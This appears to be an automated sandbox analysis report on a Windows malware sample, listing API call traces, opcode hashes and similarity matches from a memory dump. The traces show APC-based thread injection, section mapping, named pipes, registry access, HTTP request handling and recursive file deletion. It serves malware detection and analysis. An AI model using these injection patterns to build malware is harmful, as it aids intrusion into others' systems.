  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
